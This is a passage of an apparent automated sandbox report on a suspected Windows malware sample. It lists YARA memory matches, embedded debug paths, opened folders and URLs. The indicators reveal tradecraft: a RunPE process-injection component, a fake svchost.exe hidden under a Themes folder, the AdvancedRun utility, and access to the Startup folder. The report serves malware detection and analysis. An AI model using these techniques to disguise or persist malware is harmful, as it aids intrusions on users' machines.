                      Source: Yara matchFile source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 481F404B.exe PID: 6392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR
                      Source: VknMvPoCXZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: VknMvPoCXZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002udio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: osymbols\dll\System.Windows.Forms.pdbvH source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.PDBm source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbPROCESSOR_ARCHITEW6432=AMD64 source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe
                      Source: Binary string: ndel\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb9- source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: ease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe\??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbUSERDOMAIN=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbE> source: VknMvPoCXZ.exe, 00000001.00000000.400279978.0000000000AD8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb,U}< source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb@ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb\aero\Shell\4B6A7152\svch source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: ; .pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbCOMPUTERNAME=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb+ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: lib.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb9C-4437-8B11-F424491E3931}\Server source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbDriverData=C:\Windows\System32\Drivers\DriverData source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb(m source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbs source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbZS!'~< source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbpdbtry.pdb_ source: VknMvPoCXZ.exe, 00000001.00000002.568888200.0000000000A84000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbS source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb(m source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: o.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: symbols\dll\System.Windows.Forms.pdbvs. source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: iHC:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdbM( source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: svchost.PDB source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: svchost.exe, 00000004.00000002.565621441.0000028D9A48A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: svchost.exe, 00000004.00000002.565621441.0000028D9A48A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: svchost.exe, 00000004.00000002.563938277.0000028D9A40F000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000003.244837348.000000000082D000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.251876624.00000000055DD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: VknMvPoCXZ.exe, 00000001.00000003.251440194.00000000055D9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers19
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comicva
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comue
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                      Source: VknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000003.247622790.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: VknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnf
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/5.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/curs
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoftc.
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comnt
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krB2
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krlea
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kropyw2-
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245836341.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comnm
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
